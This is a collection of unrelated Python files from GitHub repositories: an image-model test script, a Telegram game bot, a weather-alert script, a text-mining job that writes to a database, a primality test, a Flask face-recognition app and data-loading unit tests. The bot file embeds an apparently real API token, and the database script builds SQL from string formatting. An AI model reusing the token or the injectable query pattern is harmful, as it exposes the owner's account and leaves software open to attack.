show(img):\n \"\"\" Prediction visualization \"\"\"\n\n plt.figure(figsize=(12, 8))\n npimg = img.numpy()\n plt.imshow(np.transpose(npimg, (1, 2, 0)), interpolation='nearest')\n plt.show()\n\n\ndef test():\n # Normalization\n x_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize([0.5], [0.5])\n ])\n\n y_transform = transforms.ToTensor()\n\n batch_size = 1\n\n PATH = r'E:\\CPP\\AutoEncoder\\model\\threshold\\UNetRev-0.20-4.pth'\n\n # Load Test dataset\n test_root = r'D:\\CPP\\ThresholdDataset3.0\\TR\\test\\0.20'\n label_root = r'D:\\CPP\\ThresholdDataset3.0\\Gray\\test\\0.20'\n test_set = EvalDataset(img_root=test_root,\n label_root=label_root,\n transform=x_transform,\n target_transform=y_transform)\n test_dataloader = DataLoader(test_set,\n batch_size=batch_size,\n shuffle=False,\n num_workers=4)\n\n # Load model\n model = AB_UNet(1, 1).to(device)\n\n # Load dict\n model.load_state_dict(torch.load(PATH, map_location=lambda storage, loc: storage))\n\n model.eval()\n\n psnr_ = []\n ssim_ = []\n with torch.no_grad():\n for index, batches in enumerate(test_dataloader):\n images, labels = batches\n\n # CUDA\n images = images.to(device)\n labels = labels.to(device)\n\n predicts = model(images)\n\n # Visualize\n save_image(predicts, r\"D:\\Threshold_Test\\recon\\0.20\\{}.png\".format(index + 1), normalize=True,\n range=(-1, 1), scale_each=False, pad_value=0)\n show(make_grid(predicts, normalize=True, range=(-1, 1), scale_each=False, pad_value=0))\n\n # Calculate SSIM & PSNR\n ImageEval1 = ImageEval_(predicts.clamp(0.1, 1.0), labels, channel=1)\n ImageEval2 = ImageEval_(images.clamp(0.1, 1.0), labels, channel=1)\n psnr_score1 = ImageEval1.cal_psnr() # predict\n psnr_score2 = ImageEval2.cal_psnr() # img\n psnr_.append((psnr_score1, psnr_score2))\n\n ssim_score1 = ImageEval1.cal_ssim()\n ssim_score2 = ImageEval2.cal_ssim()\n ssim_.append((ssim_score1, ssim_score2))\n\n data_psnr = pd.DataFrame(psnr_)\n data_psnr.to_csv('csvs/psnr-thresh.csv')\n\n data_ssim = pd.DataFrame(ssim_)\n data_ssim.to_csv('csvs/ssim-thresh.csv')\n\n\nif __name__ == '__main__':\n print(\"Start Test >>>>>>>>>>>>>>>>\")\n test()\n print('######### Finished Test #########')\n","repo_name":"Panpan-Chen/Attention-Block-U-net","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26177957194","text":"import telebot\nfrom telebot import types\nimport random\n\nsweets = 2021\nMAX_SWEET = 28\nUSER = 'пользователь'\nBOT = 'бот'\nuser_sweet = 0\nflag = USER\nRULES = 'На столе лежит {} конфета. Игрок и бот делают ход друг после друга. Первый ход определяется жеребьёвкой. За один ход можно забрать не более чем {} конфет. Победа достается игроку, если тот заберет последние конфеты.'.format(sweets, MAX_SWEET)\n\nbot = telebot.TeleBot('6026294172:AAFZzeoZbOXj_Thx8dB1iV5S1KzZwxXX-9w')\n\n@bot.message_handler(commands=['start'])\ndef start(message):\n bot.send_message(message.chat.id, '/play')\n\n@bot.message_handler(commands=['play'])\ndef button(message):\n markup = types.ReplyKeyboardMarkup(resize_keyboard=True)\n rules = types.KeyboardButton('Правила игры')\n game = types.KeyboardButton('Начать игру')\n markup.add(rules)\n markup.add(game)\n bot.send_message(message.chat.id, 'Выберите действие :)', reply_markup=markup)\n\n@bot.message_handler(content_types='text')\ndef controller(message):\n global flag\n\n if message.text == 'Правила игры':\n bot.send_message(message.chat.id, RULES)\n button(message)\n elif message.text == 'Начать игру':\n first_turn = random.choice([BOT, USER])\n flag = USER if first_turn == USER else BOT\n\n bot.send_message(message.chat.id, 'Первым ходит - {}. /ok'. format(flag))\n bot.register_next_step_handler(message, game)\n\n@bot.message_handler(commands=['ok'])\ndef game(message):\n global sweets\n global flag\n\n if sweets > 0:\n if flag == USER:\n bot.send_message(message.chat.id, f'Возьми от 0 до {MAX_SWEET} конфет')\n bot.register_next_step_handler(message, user_turn)\n else:\n bot_turn(message)\n else:\n winner = USER if flag == BOT else BOT\n bot.send_message(message.chat.id, f'Победитель - {winner}!')\n button(message)\n\n@bot.message_handler(content_types='text')\ndef user_turn(message):\n global sweets\n global flag\n\n user_sweet = int(message.text)\n if user_sweet < 0 or user_sweet > 28:\n msg = bot.send_message(message.chat.id, 'Количество конфет должно быть от 0 до 28.')\n bot.register_next_step_handler(msg, user_turn)\n return\n \n sweets -= user_sweet\n if sweets > 0:\n bot.send_message(message.chat.id, f'Остаток конфет - {sweets}')\n else:\n bot.send_message(message.chat.id, 'Конфеты закончились.')\n flag = BOT\n game(message)\n\ndef bot_turn(message):\n global sweets\n global flag\n\n bot_sweet = random.randint(1, 28)\n bot.send_message(message.chat.id, f'Жадный бот забрал {bot_sweet} конфет')\n sweets -= bot_sweet\n if sweets > 0:\n bot.send_message(message.chat.id, f'Остаток конфет - {sweets}')\n else:\n bot.send_message(message.chat.id, 'Конфеты закончились.')\n flag = USER\n game(message)\n\nbot.polling(none_stop=True)","repo_name":"KovgardVA/Python_HomeWork","sub_path":"Seminar 9/tg_main.py","file_name":"tg_main.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71272541975","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport inspect\nimport os\nimport sys\nimport socket\n# set system paths for importing custom modules/functions\ncur_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nhostname = socket.gethostname()\nif '__file__' in globals():\n # if not running in debugger, assign parent directory of file to system paths\n parent_dir = os.path.dirname(os.path.dirname(cur_dir))\n sys.path.insert(0, os.path.join(parent_dir, 'blue2'))\nelse:\n # otherwise set system paths based on project directory in PyCharm\n sys.path.insert(0, os.path.join(cur_dir, 'blue2'))\n# import custom modules\nimport json\nfrom collections import OrderedDict\nfrom urllib.request import urlopen\n# custom modules\nfrom primary.maintools import Paths, DateTools, CSVHelper\nfrom logger.pylogger import Log\nfrom comm.commtools import 
PBullet\n\n\np = Paths()\n# initiate logging\nlogg = Log('severe_weather', p.log_dir, 'sevweather', 'DEBUG')\nlogg.debug('Logger initiated.')\n\nds_api = p.key_dict['darksky_api']\npb_api = p.key_dict['pushbullet_api']\n\ndtools = DateTools()\ncsvhelp = CSVHelper()\npb = PBullet(pb_api)\n\n# set location for query (home)\nloc = p.home_loc\n\nlogg.debug('Loading previous alert file')\nprev_alerts_path = os.path.join(p.data_dir, 'previous_alerts.csv')\n\nurl = \"https://api.darksky.net/forecast/{}/{}?units=si&exclude=currently,flags\".format(ds_api, loc)\nlogg.debug('Fetching DarkSky data from url: {}'.format(url))\ndarkskydata = urlopen(url).read().decode('utf-8')\ndata = json.loads(darkskydata)\n\n# collect info on weather alerts\nalerts = data.get('alerts')\nif alerts is not None:\n    logg.debug('Alerts fetched:{}'.format(len(alerts)))\n    if os.path.exists(prev_alerts_path):\n        prev_alerts = csvhelp.csv_to_ordered_dict(prev_alerts_path)\n    else:\n        prev_alerts = None\n\n    for alert in alerts:\n        title = alert['title']\n        regions = alert['regions']\n        desc = alert['description']\n        time_reported = dtools.unix_to_string(alert['time'], '%Y%m%d_%H%M%S')\n        expires = dtools.unix_to_string(alert['expires'], '%Y%m%d_%H%M%S')\n        expires_formatted = dtools.unix_to_string(alert['expires'], '%Y-%m-%d %H:%M:%S')\n        if prev_alerts is not None:\n            if not any(['{}-{}'.format(d['title'], d['reported']) == '{}-{}'.format(title, time_reported) for d in prev_alerts]):\n                # if no matches in previous alerts file...\n                # ... add new alerts to that file and send message\n                new_alert_dict = OrderedDict((\n                    ('title', title),\n                    ('reported', time_reported),\n                    ('expiration', expires),\n                ))\n                pb.send_message('{} until {}'.format(title, expires_formatted), desc)\n                # Add new alert dict to list\n                prev_alerts.append(new_alert_dict)\n                # Rewrite file to disk\n                csvhelp.ordered_dict_to_csv(prev_alerts, prev_alerts_path)\nelse:\n    logg.debug('No alerts found, ending.')\n\n\nlogg.close()\nsys.exit()\n\n","repo_name":"barretobrock/blue2","sub_path":"weather/severe_weather_check.py","file_name":"severe_weather_check.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28898166037","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nimport re # added\nfrom dotenv import load_dotenv\nimport pandas as pd\nfrom collections import Counter\nfrom datetime import datetime\nimport pickle\n\nfrom konlpy.tag import Komoran, Okt, Mecab\nfrom database import Database\nimport platform\n\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer, TfidfVectorizer\nfrom sklearn.metrics.pairwise import linear_kernel, cosine_similarity\n\n\n# data preprocessing function\ndef preprocessing(review):\n    # remove everything except Hangul characters\n    hangul = re.compile('[^가-힣]')\n    review_text = hangul.sub(' ', review)\n\n    # tokenize into morphemes with Komoran\n    # komoran = Komoran()\n    # word_review = komoran.nouns(review_text)\n\n    # install Mecab (much faster than Komoran)\n    # https://velog.io/@jyong0719/konlpy-mecab-%EC%84%A4%EC%B9%98-window\n    if platform.system() == \"Linux\":\n        mecab = Mecab()\n    else:\n        mecab = Mecab(dicpath=os.environ.get('MECAB_DIR'))\n    word_review = mecab.nouns(review_text)\n\n    # remove stopwords\n    fire_dragon = ['의', '이', '있', '하', '들', '그', '되', '수', '보', '않', '없', '나', '사람', '아', '등', '같', '오', '있','한']\n    fire_dragon += ['여행', '사진', '시간', '정도', '생각', '지만', '절대', '니다', '', '그간', '남이', '조금', '후기', '사용', '도착', '때문', '보니', '안녕하세요',\n                    '이다', '한국', '이랑', '이번', '간다', '완전', '이건', '나름', '하면', '여기', '다음', '이후', '']\n    word_review = list(set(word_review))\n    fire_word = [w for w in word_review if not w in fire_dragon and len(w)>1]\n\n    return fire_word # return the lightly preprocessed token list\n\n\n\n\nif __name__ == \"__main__\":\n    # load .env\n    load_dotenv()\n    # os.environ['JAVA_HOME'] = os.environ.get('JAVA_HOME')\n\n    # load the crawled csv files under ./blog_data/\n    crawl_path = './blog_data/'\n    file_list = os.listdir(crawl_path)\n    file_list = sorted(file_list, key=lambda x: int(x.split('_')[0])) # sort by the number in the file name\n\n    # fetch the country id from the Database\n    db = Database()\n\n    country_word_list = []\n\n    for file in file_list:\n        country_name = file.split('_')[1]\n        res = db.select(f'select id from country where name=\"{country_name}\"')\n        if len(res) == 0:\n            continue\n\n        country_id = res[0][0]\n\n        # read the csv with pandas\n        # lineterminator parameter was added due to a buffer-overflow-related error\n        data = pd.read_csv(crawl_path + file)\n        word_set = []\n\n        for idx, content in enumerate(data['contents']):\n            try:\n                final_word_list = preprocessing(content)\n                word_set.extend(final_word_list)\n            except Exception as e:\n                if str(e).find('expected string or bytes-like object') != -1:\n                    continue\n                print(e)\n\n        # print(wc)\n        wc = dict(Counter(word_set).most_common())\n        wc = dict(filter(lambda x:x[1] > 10, wc.items())) # keep only words that occur more than 10 times\n        country_word_list.append(\" \".join(word_set)) # data to be saved with pickle\n\n        print(f\"{country_id}_{country_name} : LENGTH={len(str(wc))}\")\n        print(\"=\" * 50)\n\n        # insert the data into the Database (UPDATE if the row already exists)\n        cur_time = datetime.today().strftime(\"%Y/%m/%d %H:%M:%S\")\n        query = f'INSERT INTO country_data VALUES({country_id}, \"{str(wc)}\", now()) ' \\\n                f'ON DUPLICATE KEY UPDATE id=\"{country_id}\", contents=\"{str(wc)}\", upload_time=now();'\n\n        # db.query(query)\n\n    db.close()\n\n\n    # save the TF-IDF vectors to a pickle file\n    vectorizer = TfidfVectorizer(max_features=500) # extract the top 500 words\n    tfidf_matrix = vectorizer.fit_transform(country_word_list)\n\n    cosine_sim = linear_kernel(tfidf_matrix, tfidf_matrix)\n    cosine_sim = np.array(cosine_sim)\n\n    # save the cosine similarity matrix with pickle\n    with open('data.pickle', 'wb') as f:\n        pickle.dump(cosine_sim, f)\n        print('data.pickle 저장 완료')","repo_name":"kookmin-sw/capstone-2023-14","sub_path":"DM/csv_to_db.py","file_name":"csv_to_db.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12293207541","text":"import pickle\nfrom multilang_summarizer.lemmatizer import Lemmatizer\nimport xml.etree.ElementTree as ET\nfrom multilang_summarizer.summarizer import Document, summarizer, clean_working_memory, summary_limit, summary_wordlimit\n\nfrom multilang_summarizer.readability import flesch_kincaid\n\nimport random\n\nimport os\n\ntest_dir = \"./test_documents/en/\"\noutput_dir = \"./output_documents/en/\"\n\ncurrent_source = 1\nfor f_path in os.listdir(test_dir):\n    if not f_path.endswith(\".txt\"):\n        document_path = test_dir + f_path\n        tree = ET.parse(document_path)\n        root = tree.getroot()\n        original_text = root.find(\"TEXT\").text\n        with open(test_dir + \"%d.txt\" % current_source, \"w\") as fp:\n            fp.write(original_text)\n        current_source += 1\n\n# Try to create needed dirs in the beginning\ntry:\n    os.makedirs(output_dir)\nexcept:\n    pass\n\n# Cleanup\nclean_working_memory()\n\nfor f_path in os.listdir(output_dir):\n    os.remove(output_dir + f_path)\n\n# Read input paths\npaths = []\nfor f_path in os.listdir(test_dir):\n    if f_path.endswith(\".txt\"):\n        paths.append(test_dir + f_path)\n\nrandom.shuffle(paths)\n\nlemmatizer = 
Lemmatizer.for_language(\"en\")\n\nRS = {}\nscores = {}\nfor path in paths:\n    RS[1], scores[1] = summarizer(path, \"f1\", \"partial\", lemmatizer, 11)\n    RS[2], scores[2] = summarizer(path, \"f1\", \"probabilistic\", lemmatizer, 12)\n    RS[3], scores[3] = summarizer(path, \"f1\", \"lcs\", lemmatizer, 13)\n\n    RS[4], scores[4] = summarizer(path, \"f2\", \"partial\", lemmatizer, 14)\n    RS[5], scores[5] = summarizer(path, \"f2\", \"probabilistic\", lemmatizer, 15)\n    RS[6], scores[6] = summarizer(path, \"f2\", \"lcs\", lemmatizer, 16)\n\n    RS[7], scores[7] = summarizer(path, \"f3\", \"partial\", lemmatizer, 17)\n    RS[8], scores[8] = summarizer(path, \"f3\", \"probabilistic\", lemmatizer, 18)\n    RS[9], scores[9] = summarizer(path, \"f3\", \"lcs\", lemmatizer, 19)\n\n    print(\"Processed:\", path)\n\nbyte_limit = 661 # bytes\nfor i in range(1, 10):\n    limited_summary = summary_limit(RS[i].aligned_sentences, scores[i],\n                                    byte_limit)\n    raw_limited_summary = \"\\n\".join([raw_sent for raw_sent, _, _ in\\\n            limited_summary])\n    with open(output_dir + \"limited_summary_%d.txt\" % i, \"w\") as fp:\n        fp.write(raw_limited_summary)\n\n    print(\"\\n\\n\", i, \"\\n\\n\", raw_limited_summary)\n    limited_summary = Document(output_dir + \"limited_summary_%d.txt\" %i,\n                               lemmatizer)\n    try:\n        print(\"\\nReadability\", flesch_kincaid(limited_summary.tok_sentences))\n    except:\n        pass\n","repo_name":"elmugrearturo/multilang_summarizer","sub_path":"tests/test_english.py","file_name":"test_english.py","file_ext":"py","file_size_in_byte":2592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70557776533","text":"import random\nfrom cryptolib.utils.common import gcd\n\n\n##\n# Test whether a number n is prime\n#\n# @params n Number to test\n# @params rounds Number of rounds to test\ndef millerrabin(n, rounds=128):\n    # n has to be odd and greater than 2\n    if n & 1 == 0 or n <= 2:\n        return False\n    s = n - 1\n    t = 0\n    # search for the t which produces the equation 2^t*s = n-1\n    while s & 1 == 0:\n        s = s // 2\n        t = t + 1\n\n    # loop until the probability of a false result is small enough\n    # the default value 128 produces a probability of 2^(-128)\n    k = 0\n    while k < rounds:\n        a = random.randint(2, n - 1)\n        if gcd(a, n) != 1:\n            return False\n        v = pow(a, s, n)\n        if v != 1:\n            i = 0\n            while v != n - 1:\n                if i == t - 1:\n                    return False\n                else:\n                    v = pow(v, 2, n)\n                    i += 1\n        k += 2\n\n    return True\n","repo_name":"CryptoMathician/ctf-cryptolib","sub_path":"cryptolib/utils/primes/primetests.py","file_name":"primetests.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"34644856010","text":"from flask import Flask, Response\r\nfrom flask.templating import render_template\r\nimport click\r\nimport cv2\r\nfrom dotenv import load_dotenv\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom flask_migrate import Migrate\r\nfrom flask_login import LoginManager\r\n\r\nfrom config import Config\r\nfrom src.core.face_verificator import FaceVerificator\r\nfrom src.core.face_encoder import FaceEncoder\r\nfrom src.core.face_detector import FaceDetector\r\n\r\nload_dotenv()\r\n\r\ndb = SQLAlchemy()\r\n\r\napp = Flask(__name__)\r\n\r\napp.config.from_object(Config)\r\n\r\ndb.init_app(app)\r\nmigrate = Migrate(app, db)\r\n\r\nlogin_manager = LoginManager()\r\nlogin_manager.login_view = 'admin.login'\r\nlogin_manager.login_message_category = 'danger'\r\nlogin_manager.init_app(app)\r\n\r\n\r\nface_detector = FaceDetector()\r\nface_encoder = FaceEncoder()\r\nface_recognizer = FaceVerificator()\r\n\r\ncamera = cv2.VideoCapture(0)\r\n\r\n\r\nprint(\"All classes successfully loaded!\")\r\n\r\n\r\nfrom api.controllers.role import RoleController\r\nfrom api.controllers.user import UserController\r\n\r\nrole_controller = RoleController()\r\nuser_controller = UserController()\r\n\r\n@app.cli.command('seed')\r\n@click.argument('args')\r\ndef seed(args):\r\n\r\n    if args == 'role':\r\n        role_controller.create(name='user')\r\n        role_controller.create(name='admin')\r\n        print('Role has been seeded')\r\n        return\r\n\r\n    if args == 'admin':\r\n        user_controller.create(\r\n            name=Config.ADMIN_NAME,\r\n            email=Config.ADMIN_EMAIL,\r\n            role_id=role_controller.fetch_by_name('admin').id,\r\n            password=Config.ADMIN_PASSWORD\r\n        )\r\n        print('Dummy admin has been seeded')\r\n        return\r\n\r\n\r\ndef get_frame():\r\n    while True:\r\n        success, frame = camera.read()\r\n        if not success:\r\n            break\r\n        else:\r\n            start_point, end_point = face_detector.get_face_boundary(frame)\r\n            cv2.rectangle(frame, start_point, end_point, (0, 255, 0), 2)\r\n            ret, buffer = cv2.imencode('.jpg', img=frame)\r\n            frame_bytes = buffer.tobytes()\r\n            yield (b'--frame\\r\\n'\r\n                   b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame_bytes + b'\\r\\n')\r\n\r\n\r\n@app.route('/')\r\ndef index():\r\n    return render_template('index.html')\r\n\r\n\r\n@app.route('/video')\r\ndef video():\r\n    return Response(get_frame(), mimetype='multipart/x-mixed-replace; boundary=frame')\r\n\r\n\r\n@login_manager.user_loader\r\ndef load_user(user_id):\r\n    return user_controller.fetch_by_id(user_id)\r\n\r\nfrom api.routes.service import service\r\n\r\napp.register_blueprint(service, url_prefix='/')\r\n\r\nfrom api.routes.user import user\r\nfrom api.routes.admin import admin\r\n\r\nadmin.register_blueprint(user, url_prefix='/user')\r\napp.register_blueprint(admin, url_prefix='/admin')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    app.run(debug=True)\r\n","repo_name":"ukayaj620/precencia","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"17317325918","text":"import unittest\nimport logging\nfrom unittest.mock import patch\nfrom fedbiomed.common.data import DataLoadingPlan, DataLoadingPlanMixin, MapperBlock\nfrom testsupport.testing_data_loading_block import LoadingBlockForTesting, LoadingBlockTypesForTesting, \\\n    TestAbstractsBlock\nfrom fedbiomed.common.exceptions import FedbiomedLoadingBlockError, FedbiomedLoadingBlockValueError, \\\n    FedbiomedDataLoadingPlanValueError, FedbiomedDataLoadingPlanError\nfrom fedbiomed.common.constants import DatasetTypes\n\n\nclass TestDataLoadingBlock(unittest.TestCase):\n    def setUp(self):\n        self.changed_data = {'my': 'different-data'}\n        self.dlb1 = LoadingBlockForTesting()\n        self.dlb2 = LoadingBlockForTesting()\n\n    def test_data_loading_block_01_serialize_and_load(self):\n        \"\"\"Tests that DataLoadingBlock is serialized and loaded correctly\"\"\"\n        self.dlb1.data = self.changed_data\n        self.assertFalse(self.dlb1.data == self.dlb2.data)\n        serialized = self.dlb1.serialize()\n        self.assertIn('loading_block_class', serialized)\n        self.assertIn('loading_block_module', serialized)\n        self.assertIn('dlb_id', serialized)\n\n        self.dlb2.deserialize(serialized)\n        self.assertDictEqual(self.dlb1.data, self.dlb2.data)\n\n        exec(f\"import {serialized['loading_block_module']}\")\n        dlb3 = eval(f\"{serialized['loading_block_module']}.{serialized['loading_block_class']}()\")\n        dlb3.deserialize(serialized)\n        self.assertDictEqual(self.dlb1.data, dlb3.data)\n\n        dlb4 = MapperBlock()\n        dlb4.map = {'test': 1, 1: 'test'}\n        serialized = dlb4.serialize()\n        exec(f\"import {serialized['loading_block_module']}\")\n        dlb5 = eval(f\"{serialized['loading_block_module']}.{serialized['loading_block_class']}()\")\n        dlb5.deserialize(serialized)\n        self.assertEqual(dlb4.get_serialization_id(), dlb5.get_serialization_id())\n        self.assertDictEqual(dlb4.map, dlb5.map)\n\n        with self.assertLogs('fedbiomed', logging.DEBUG) as captured:\n            with self.assertRaises(FedbiomedLoadingBlockValueError):\n                dlb5.deserialize({'wrong-data': 'should-not-be-here', **serialized})\n            self.assertEqual(captured.output[-1],\n                             'CRITICAL:fedbiomed:FB614: data loading block error: '\n                             'undefined key (wrong-data) in scheme')\n            with self.assertRaises(FedbiomedLoadingBlockValueError):\n                dlb5.deserialize({**serialized, 'loading_block_class': 'Wrong._format.__*$class.name'})\n            self.assertEqual(captured.output[-1],\n                             'CRITICAL:fedbiomed:FB614: data loading block error: '\n                             '__*$class within Wrong._format.__*$class.name is not a '\n                             'valid class name for deserialization of Data Loading Block.')\n            with self.assertRaises(FedbiomedLoadingBlockValueError):\n                dlb5.deserialize({**serialized, 'loading_block_module': '9Wrong.format.module.name'})\n            self.assertEqual(captured.output[-1],\n                             'CRITICAL:fedbiomed:FB614: data loading block error: '\n                             '9Wrong within 9Wrong.format.module.name is not a valid '\n                             'class name for deserialization of Data Loading Block.')\n            with self.assertRaises(FedbiomedLoadingBlockValueError):\n                dlb5.deserialize({**serialized, 'dlb_id': 'serialized_dlb_wrong-format-uuid'})\n            self.assertEqual(captured.output[-1],\n                             'CRITICAL:fedbiomed:FB614: data loading block error: '\n                             'serialized_dlb_wrong-format-uuid is not of the form '\n                             'serialized_dlb_<uuid> for deserialization of Data Loading Block.')\n            with self.assertRaises(FedbiomedLoadingBlockValueError):\n                dlb5.deserialize({**serialized, 'dlb_id': 'wrong-format-id'})\n            self.assertEqual(captured.output[-1],\n                             'CRITICAL:fedbiomed:FB614: data loading block error: '\n                             'wrong-format-id is not of the form serialized_dlb_<uuid> '\n                             'for deserialization of Data Loading Block.')\n\n    def test_data_loading_block_02_apply(self):\n        \"\"\"Tests that the apply function of DataLoadingBlock works as intended\"\"\"\n        self.dlb2.data = self.changed_data\n        dlb3 = MapperBlock()\n        dlb3.map = self.changed_data\n\n        apply_1 = self.dlb1.apply()\n        self.assertEqual(len(apply_1), 1)\n        self.assertIn('data', apply_1)\n        apply_2 = self.dlb2.apply()\n        self.assertEqual(len(apply_2), 1)\n        self.assertIn('different-data', apply_2)\n        apply_3 = dlb3.apply('my')\n        self.assertEqual(apply_3, 'different-data')\n        with self.assertRaises(FedbiomedLoadingBlockError):\n            dlb3.apply('not-my')\n\n    def test_data_loading_block_03_abstract(self):\n        \"\"\"Tests for abstract method(s) of DataLoadingBlock\"\"\"\n\n        # block class to cheat ABC into running abstract method(s)\n        dlb = TestAbstractsBlock()\n        apply = dlb.apply(\"some\", [\"arbitrary\", 3], \"arguments\", {}, 8)\n\n        self.assertEqual(apply, None)\n\n\nclass TestDataLoadingPlan(unittest.TestCase):\n    def setUp(self):\n        self.dlb1 = LoadingBlockForTesting()\n        self.dlb2 = LoadingBlockForTesting()\n        self.assertDictEqual(self.dlb1.data, self.dlb2.data)\n        self.dlb2.data = {'my': 'different-data'}\n        \n        # patchers\n        self.patcher_infer_dataset = 
patch('fedbiomed.common.data.DataLoadingPlan.infer_dataset_type',\n lambda x: DatasetTypes.NONE)\n\n def test_data_loading_plan_01_interface(self):\n \"\"\"Tests that DataLoadingPlan exposes the correct interface to the developer\"\"\"\n dlp = DataLoadingPlan()\n dlp[LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING] = self.dlb1\n dlp[LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING] = self.dlb2\n self.assertIn(LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING, dlp)\n self.assertIn(LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING, dlp)\n self.assertDictEqual(self.dlb1.data, dlp[LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING].data)\n self.assertDictEqual(self.dlb2.data, dlp[LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING].data)\n\n it = iter(dlp.items())\n first_key, first_dlb = next(it)\n self.assertEqual(first_key, LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING)\n self.assertDictEqual(self.dlb1.data, first_dlb.data)\n second_key, second_dlb = next(it)\n self.assertEqual(second_key, LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING)\n self.assertDictEqual(self.dlb2.data, second_dlb.data)\n\n str_repr = str(dlp)\n self.assertIn(dlp.dlp_id, str_repr)\n self.assertIn(LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING.value, str_repr)\n self.assertIn(LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING.value, str_repr)\n\n with self.assertRaises(FedbiomedDataLoadingPlanValueError):\n dlp['string'] = self.dlb1\n with self.assertRaises(FedbiomedDataLoadingPlanValueError):\n dlp[LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING] = {}\n\n def test_data_loading_plan_02_serialize_and_deserialize(self):\n \"\"\"Tests that a DataLoadingPlan can be serialized and loaded correctly\"\"\"\n dlp = DataLoadingPlan()\n dlp[LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING] = self.dlb1\n dlp[LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING] = self.dlb2\n dlp2 = DataLoadingPlan()\n self.assertNotEqual(dlp.dlp_id, dlp2.dlp_id)\n self.assertNotIn(LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING, dlp2)\n self.assertNotIn(LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING, dlp2)\n\n serialized_dlp, serialized_loading_blocks = dlp.serialize()\n self.assertIn('dlp_id', serialized_dlp)\n self.assertIsInstance(serialized_dlp['dlp_id'], str)\n self.assertIn('dlp_name', serialized_dlp)\n self.assertIsInstance(serialized_dlp['dlp_name'], str)\n self.assertIn('loading_blocks', serialized_dlp)\n self.assertIsInstance(serialized_dlp['loading_blocks'], dict)\n self.assertEqual(len(serialized_dlp['loading_blocks']), 2)\n self.assertIn('key_paths', serialized_dlp)\n self.assertIsInstance(serialized_dlp['key_paths'], dict)\n\n self.assertIsInstance(serialized_loading_blocks, list)\n self.assertEqual(len(serialized_loading_blocks), 2)\n self.assertIn('dlb_id', serialized_loading_blocks[0])\n self.assertIn('dlb_id', serialized_loading_blocks[1])\n\n self.assertIn(serialized_loading_blocks[0]['dlb_id'],\n serialized_dlp['loading_blocks'].values())\n self.assertIn(serialized_loading_blocks[1]['dlb_id'],\n serialized_dlp['loading_blocks'].values())\n\n dlp2.deserialize(*dlp.serialize())\n self.assertIn(LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING, dlp2)\n self.assertIn(LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING, dlp2)\n self.assertEqual(dlp.dlp_id, dlp2.dlp_id)\n\n dlp_values = dlp[LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING].apply()\n dlp2_values = 
dlp2[LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING].apply()\n        for v1, v2 in zip(dlp_values, dlp2_values):\n            self.assertEqual(v1, v2)\n\n        with self.assertRaises(FedbiomedLoadingBlockError):\n            dlp_metadata, dlbs_metadata = dlp.serialize()\n            dlbs_metadata[0]['loading_block_class'] = 'WrongClass'\n            DataLoadingPlan().deserialize(dlp_metadata, dlbs_metadata)\n\n        with self.assertRaises(FedbiomedDataLoadingPlanError):\n            dlp_metadata, dlbs_metadata = dlp.serialize()\n            dlp_metadata['key_paths'][LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING.value] = \\\n                ('WrongKeyModule', 'WrongKeyName')\n            DataLoadingPlan().deserialize(dlp_metadata, dlbs_metadata)\n\n    def test_data_loading_plan_03_mixin_functionality(self):\n        \"\"\"Tests that the DataLoadingPlanMixin class provides the intended functionality\"\"\"\n        class MyDataset(DataLoadingPlanMixin):\n            def __init__(self):\n                super(MyDataset, self).__init__()\n\n            @staticmethod\n            def get_dataset_type():\n                return DatasetTypes.TEST\n\n        tp = MyDataset()\n        dlp = DataLoadingPlan()\n        dlp[LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING] = self.dlb1\n        dlp[LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING] = self.dlb2\n        dlp.target_dataset_type = DatasetTypes.TEST\n\n        # heuristic test that no DLP exists for the dataset\n        apply_1 = 